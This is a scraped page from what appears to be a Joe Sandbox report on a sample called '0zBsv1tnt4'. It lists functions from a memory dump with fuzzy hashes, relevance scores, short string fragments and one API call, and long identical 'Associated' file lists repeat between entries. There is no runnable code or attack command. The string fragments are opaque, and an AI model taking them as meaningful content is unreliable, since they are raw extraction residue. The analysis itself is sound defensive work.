Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: e0b9c9ee5ec490c52f118d4d5a5e90b84d1955a80d9e10de50f2027cd366e413
Instruction ID: d4d1706e7ab0fe7a784df10090429d372af379e46df21d92ea350802e91370cb
Opcode Fuzzy Hash: e0b9c9ee5ec490c52f118d4d5a5e90b84d1955a80d9e10de50f2027cd366e413
Instruction Fuzzy Hash: 4C12F17291D341CFD3248F28D88071FBBE1FF85310F198A6DE999572A1DB359901CB96

Function 0098CDF0 Relevance: 6.9, Strings: 5, Instructions: 697COMMON

Download Yara Rule

Strings

f, xrefs: 0098D081
_^]\, xrefs: 0098CE29
_^]\, xrefs: 0098D006
fiP, xrefs: 0098D2CF
jiP, xrefs: 0098D301

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: InitializeThunk
String ID: _^]\$_^]\$f$fiP$jiP
API String ID: 2994545307-2734853458
Opcode ID: 4e6bd0695164b7e194e983c95e17de4a460a7826797405c157671862b394c600
Instruction ID: 0932cd1073998786bf62cea30e2f54c7d2f1b6b70d96f8611a0a79766aed6292
Opcode Fuzzy Hash: 4e6bd0695164b7e194e983c95e17de4a460a7826797405c157671862b394c600
Instruction Fuzzy Hash: 7022F2B160D3029FD718DF29C890B2EBBE6AFD9314F188A2DF495973D5D630D8418B92

Function 00976D2E Relevance: 6.7, Strings: 5, Instructions: 482COMMON

Download Yara Rule

Strings

PV, xrefs: 00976DB3
X^, xrefs: 00976DA5
_^]\_^]\, xrefs: 00977064
\R, xrefs: 00976DAC
uYD\, xrefs: 00976E3D

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: _^]\_^]\$uYD\$PV$X^$\R
API String ID: 0-2314179683
Opcode ID: 3a6cb85188fd356cb952d2bba0a99cd942072717808697b95ac994ae66cf1a16
Instruction ID: a48cb6343dbb8c0c1abd4321955f959449859635504f811f54c2830ca9fd151e
Opcode Fuzzy Hash: 3a6cb85188fd356cb952d2bba0a99cd942072717808697b95ac994ae66cf1a16
Instruction Fuzzy Hash: 8DF1E0B2E28314CFDF14CFA9D8816AEBBB1FB49300F18446DD552AB351D775A942CB90

Function 009724E0 Relevance: 6.6, Strings: 5, Instructions: 304COMMON

Download Yara Rule

Strings

.[TU, xrefs: 00972538
"_,Y, xrefs: 00972530
pCj], xrefs: 00972528
;GsA, xrefs: 00972520
=K0E, xrefs: 00972544

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
API String ID: 0-1171452581
Opcode ID: 93a29062b687bbfb179ab68fe2604605572b78a5c389e34e4e9de51e86204c90
Instruction ID: 787907ead9372c787bf25a268751187b1939a593f9db058644179823a7612593
Opcode Fuzzy Hash: 93a29062b687bbfb179ab68fe2604605572b78a5c389e34e4e9de51e86204c90
Instruction Fuzzy Hash: 6B9102B26183009BC724DF24C891B67B7F5EFD5714F19882CF9898B292E375E906C752

Function 00968169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON

Download Yara Rule

Strings

2h?n, xrefs: 009683A0
SP, xrefs: 00968396
^`/4, xrefs: 009681E1
gfff, xrefs: 00968458
7, xrefs: 00968419

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: 2h?n$7$SP$^`/4$gfff
API String ID: 0-3257051659
Opcode ID: e683b104e885831b43b9b96180111a1a2829cbc49b70c853e763821e231f0b29
Instruction ID: b9f3037b4dbea08d0ff6abdb9111b7e66ac773d5905a1cfd0496fed1717b4e84
Opcode Fuzzy Hash: e683b104e885831b43b9b96180111a1a2829cbc49b70c853e763821e231f0b29
Instruction Fuzzy Hash: 51A12A72A183514BD714CF28D851B6FB7E6FBC4314F598A3DE885D7391EA3889068781

Function 00971340 Relevance: 5.5, Strings: 4, Instructions: 493COMMON

Download Yara Rule

Strings

9deZ, xrefs: 00971818
{s, xrefs: 00971520
eb, xrefs: 009716F6
sp, xrefs: 00971528

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: 9deZ$eb$sp${s
API String ID: 0-3993331145
Opcode ID: b0abd9c67ddcd2221d8f5ab25b89743c41fdda0613e11f8b92db2a1237654dbf
Instruction ID: e30ae15e3ca6b435ff0042aec2d614cb5da8097ef0e968cdb489ec94ee181e8e
Opcode Fuzzy Hash: b0abd9c67ddcd2221d8f5ab25b89743c41fdda0613e11f8b92db2a1237654dbf
Instruction Fuzzy Hash: 79D1E6B15183148BC728DF28C89166BB7F2FFD5354F18DA1CE59A8B3A0E7789904C752

Function 009791AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 009791DA

Strings

+Ku, xrefs: 009792AF
wpq, xrefs: 009792B7

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
